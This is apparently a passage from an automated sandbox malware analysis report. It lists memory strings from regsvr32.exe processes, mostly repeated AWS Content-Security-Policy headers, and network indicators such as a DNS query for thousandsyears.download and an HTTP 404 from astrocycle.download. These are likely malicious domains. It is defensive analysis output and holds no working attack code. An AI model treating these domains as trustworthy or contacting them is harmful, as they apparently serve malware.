https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: regsvr32.exe, 00000003.00000003.2109396502.00000000034DD000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-IdRSHx7D5J2kwDcZGc8WDR6vvEh4aZOmtJ2zpgFcSNa6z6R-Er35n0nA==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
          Source: regsvr32.exe, 00000003.00000003.2109396502.00000000034DD000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-IdRSHx7D5J2kwDcZGc8WDR6vvEh4aZOmtJ2zpgFcSNa6z6R-Er35n0nA==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idk2BZmsK8lKGHbUyzbQJ9X9KQ6ZDsaszkVJhdyJ9wUGjqYWYJNQdO1w==X-Amz-Cf-PopZRH50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gsta equals www.linkedin.com (Linkedin)
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gsta equals www.linkedin.com (Linkedin)
          Source: regsvr32.exe, 00000003.00000003.2109396502.00000000034DD000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
          Source: regsvr32.exe, 00000003.00000003.2109396502.00000000034DD000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: unknownDNS traffic detected: queries for: thousandsyears.download
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:17:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2MV8QitoddGiqss38WJx5%2B9Wu21O9R3oblVcjmnoYS6hvtwuO3Ylf9xWJt5pGmKgQ9nMTT5PXIBp61pfoR72DvSfwcCx4%2FdLJOIM%2BsubmRh4CA5TateDl6nBJUbpkYJNYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a91d23bcedc2c7-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
